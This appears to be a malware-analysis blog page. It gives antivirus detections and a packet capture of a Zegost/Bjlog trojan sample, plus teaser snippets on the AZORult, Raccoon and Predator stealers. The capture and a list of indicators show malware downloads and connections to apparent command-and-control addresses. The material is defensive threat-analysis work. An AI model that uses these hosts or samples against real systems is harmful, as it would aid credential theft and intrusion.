| SHA256: | 745e0a1c522ac9b91ea00198dc89373da7bdb032c56096ba5c3aebc13ad52ad7 |
| File name: | he.exe |
| Detection ratio: | 60 / 61 |
| Analysis date: | 2017-05-21 20:59:17 UTC ( 0 minutes ago ) |
| Ad-Aware | Gen:Variant.Zegost.2 | 20170521 |
| AegisLab | Troj.PSW32.W.Bjlog.kZLs | 20170521 |
| AhnLab-V3 | Trojan/Win32.Bjlog.R2244 | 20170521 |
| ALYac | Gen:Variant.Zegost.2 | 20170520 |
| Antiy-AVL | Trojan[PSW]/Win32.Bjlog.dtwr | 20170521 |
| Arcabit | Trojan.Zegost.2 | 20170521 |
| Avast | Win32:Zegost-C [Trj] | 20170521 |
| AVG | Agent_r.AIO | 20170521 |
| Avira (no cloud) | TR/PSW.Bjlog.lfzb | 20170521 |
| AVware | Trojan.Win32.Generic.pak!cobra | 20170521 |
| Baidu | Win32.Backdoor.Zegost.b | 20170503 |
| BitDefender | Gen:Variant.Zegost.2 | 20170521 |
| Bkav | W32.ZegostQKB.Trojan | 20170520 |
| CAT-QuickHeal | TrojanDropper.Zegost.C5 | 20170520 |
| ClamAV | Win.Spyware.78740-1 | 20170521 |
| CMC | Trojan-PSW.Win32.Bjlog!O | 20170521 |
| Comodo | Backdoor.Win32.Zegost.B | 20170521 |
2017-05-21 15:47:58.953388 IP 192.168.1.102.55351 > 192.168.1.100.55555: Flags [P.], seq 1:400, ack 1, win 2053, length 399
E…..@…m@…f…d.7….+..n..P….i..GET /he.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100:55555
Connection: Keep-Alive
2017-05-21 15:47:58.953406 IP 192.168.1.100.55555 > 192.168.1.102.55351: Flags [.], ack 400, win 237, length 0
E..(.X@.@..\…d…f…7.n….,.P….5..
2017-05-21 15:47:58.953674 IP 192.168.1.100.55555 > 192.168.1.102.55351: Flags [.], seq 1:2921, ack 400, win 237, length 2920
E….Y@.@……d…f…7.n….,.P…….HTTP/1.1 200 OK
Date: Sun, 21 May 2017 19:47:58 GMT
Server: Apache/2.4.18 (Debian)
Last-Modified: Sun, 21 May 2017 19:47:36 GMT
ETag: “331e8-5500e06c39ad1”
Accept-Ranges: bytes
Content-Length: 209384
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
2017-05-21 15:48:21.851176 IP 192.168.1.102.55771 > 75.75.75.75.53: 45666+ A? www.5173book.com. (34)
E..>”……p…fKKKK…5.*…b………..www.5173book.com…..
2017-05-21 15:48:21.912078 IP 192.168.1.102.55772 > 75.75.75.75.53: 14531+ A? conf.f.360.cn. (31)
E..;”……r…fKKKK…5.’..8…………conf.f.360.cn…..
2017-05-21 15:48:22.172662 IP 192.168.1.102.55352 > 43.252.163.135.8086: Flags [S], seq 3341920473, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4j.@….s…f+….8…1…….. .U……………
2017-05-21 15:48:22.941885 IP 192.168.1.102.55352 > 43.252.163.135.8086: Flags [S], seq 3341920473, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4j.@….r…f+….8…1…….. .U……………
2017-05-21 15:48:23.712863 IP 192.168.1.102.55352 > 43.252.163.135.8086: Flags [S], seq 3341920473, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0j.@….u…f+….8…1……p. .i………..
2017-05-21 15:48:24.462699 IP 192.168.1.102.55353 > 43.252.163.135.8086: Flags [S], seq 1743823324, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4j.@….p…f+….9..g……… ……………..
2017-05-21 15:48:25.232407 IP 192.168.1.102.55353 > 43.252.163.135.8086: Flags [S], seq 1743823324, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4j.@….o…f+….9..g……… ……………..
2017-05-21 15:48:26.018872 IP 192.168.1.102.55353 > 43.252.163.135.8086: Flags [S], seq 1743823324, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0j.@….r…f+….9..g…….p. ………….
2017-05-21 15:48:26.768121 IP 192.168.1.102.55354 > 43.252.163.135.8086: Flags [S], seq 2200689634, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4j.@….m…f+….:…+…….. .f……………
2017-05-21 15:48:27.522776 IP 192.168.1.102.55354 > 43.252.163.135.8086: Flags [S], seq 2200689634, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4j.@….l…f+….:…+…….. .f……………
2017-05-21 15:48:28.271503 IP 192.168.1.102.55354 > 43.252.163.135.8086: Flags [S], seq 2200689634, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0j.@….o…f+….:…+……p. .z………..
Written By
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozill...
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info...
Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallet...
Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification:DownloaderSpyware Threat Names:AZORult v3Gen:Varian...
